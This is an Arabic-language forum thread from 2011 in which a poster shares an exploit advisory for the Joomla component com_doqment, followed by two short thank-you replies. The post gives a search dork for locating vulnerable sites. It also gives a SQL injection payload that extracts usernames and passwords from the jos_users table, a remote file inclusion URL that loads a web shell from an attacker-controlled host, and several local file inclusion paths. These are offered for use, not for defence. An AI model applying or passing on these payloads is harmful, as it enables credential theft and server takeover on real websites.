المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : Joomla Component (com_doqment) Multi Vulnerability



Hidden pain
03-14-2011, 03:46 PM
Author : KedAns-Dz

Go0gle Dork : " inurl:com_doqment "

#==============>>>>> Exploit (1) SQL Injection %100
> SQL : -11/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users--
> ExplO!t : http://[Target]/[Path]/index.php?option=com_doqment&cid= ! [ SQL Here ] !
#==============>>>>> Exploit (2) Remote File Inclusion %50 <<<<<=================#
> DzShell : http://[Your-Space]/Sh311.php
> ComBug : admin.ponygallery.html.php?mosConfig_absolute_path =
> ExplO!t : http://[Target]/[Path]/index.php?option=com_doqment&cid=[+ ComBug +]=[ ! DzShell ! ]
""" Note Fo4r This exploit RFI : 50% Because Not All Sites has Component 'ponygallery' in 'com_doqment' """
#==============>>>>> Exploit (3) Local File Inclusion %50 <<<<<=================#
> ExplO!t : http://[Target]/[Path]/components/com_doqment/documents?file=[LFI]%00
> http://[Target]/[Path]/components/com_doqment/documents/file?id=[LFI]%00
> http://[Target]/[Path]/components/com_doqment/documents/?=[LFI]%00
> http://[Target]/[Path]/components/com_doqment/files/?=[LFI]%00
> http://[Target]/[Path]/components/com_doqment/file/?=[LFI]%00

هاوي حنانك
03-16-2011, 08:20 AM
سلمت يداااك والله يعطيك العافيه

دمت في تألق وابداع

hooos
03-26-2011, 07:55 PM
مشكور والله يعطيك العافيه